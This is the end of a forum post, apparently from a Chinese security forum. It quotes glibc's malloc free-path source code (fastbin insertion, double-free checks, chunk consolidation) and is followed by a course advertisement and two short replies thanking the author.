        || ({ assert (locked == 0);
          mutex_lock(&av->mutex);
          locked = 1;
          chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
            || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
          }))
      {
        errstr = "free(): invalid next size (fast)";
        goto errout;
      }
    if (! have_lock)
      {
        (void)mutex_unlock(&av->mutex);
        locked = 0;
      }
      }
 
    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
 
    set_fastchunks(av);
    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);
 
    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    unsigned int old_idx = ~0u;
    do
      {
    /* Check that the top of the bin is not the record we are going to add
       (i.e., double free).  */
    if (__builtin_expect (old == p, 0))
      {
        errstr = "double free or corruption (fasttop)";
        goto errout;
      }
    /* Check that size of fastbin chunk at the top is the same as
       size of the chunk that we are adding.  We can dereference OLD
       only if we have the lock, otherwise it might have already been
       deallocated.  See use of OLD_IDX below for the actual check.  */
    if (have_lock && old != NULL)
      old_idx = fastbin_index(chunksize(old));
    p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
 
    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
      {
    errstr = "invalid fastbin entry (free)";
    goto errout;
      }
  }
 
  /*
    Consolidate other non-mmapped chunks as they arrive.
  */
 
  else if (!chunk_is_mmapped(p)) {
    if (! have_lock) {
      (void)mutex_lock(&av->mutex);
      locked = 1;
    }
 
    nextchunk = chunk_at_offset(p, size);
 
    /* Lightweight tests: check whether the block is already the
       top block.  */
    if (__glibc_unlikely (p == av->top))
      {
    errstr = "double free or corruption (top)";
    goto errout;
      }
    /* Or whether the next chunk is beyond the boundaries of the arena.  */
    if (__builtin_expect (contiguous (av)
              && (char *) nextchunk
              >= ((char *) av->top + chunksize(av->top)), 0))
      {
    errstr = "double free or corruption (out)";
    goto errout;
      }
    /* Or whether the block is actually not marked used.  */
    if (__glibc_unlikely (!prev_inuse(nextchunk)))
      {
    errstr = "double free or corruption (!prev)";
    goto errout;
      }
 
    nextsize = chunksize(nextchunk);
    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (nextsize >= av->system_mem, 0))
      {
    errstr = "free(): invalid next size (normal)";
    goto errout;
      }
 
    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
 
    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = p->prev_size;
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }
 
    if (nextchunk != av->top) {
      /* get and clear inuse bit */
      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
 
      /* consolidate forward */
      if (!nextinuse) {
    unlink(av, nextchunk, bck, fwd);
    size += nextsize;
      } else
    clear_inuse_bit_at_offset(nextchunk, 0);
 
      /*
    Place the chunk in unsorted chunk list. Chunks are
    not placed into regular bins until after they have
    been given one chance to be used in malloc.
      */
 
      bck = unsorted_chunks(av);
      fwd = bck->fd;
      if (__glibc_unlikely (fwd->bk != bck))
    {
      errstr = "free(): corrupted unsorted chunks";
      goto errout;
    }
      p->fd = fwd;
      p->bk = bck;
      if (!in_smallbin_range(size))
    {
      p->fd_nextsize = NULL;
      p->bk_nextsize = NULL;
    }
      bck->fd = p;
      fwd->bk = p;
 
      set_head(p, size | PREV_INUSE);
      set_foot(p, size);
 
      check_free_chunk(av, p);
    }
 
    /*
      If the chunk borders the current high end of memory,
      consolidate into top
    */
 
    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }
 
    /*

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2024-10-15 20:44 被iyheart编辑 ,原因: 修改1个错别字,修复5张图片不能显示的问题
上传的附件:
收藏
免费 13
支持
分享
最新回复 (2)
雪    币: 25688
活跃值: (4912)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
谢谢分享!
2024-10-15 20:04
1
雪    币: 225
活跃值: (491)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
3
支持校友
2024-10-16 17:33
1
游客
登录 | 注册 方可回帖
返回
//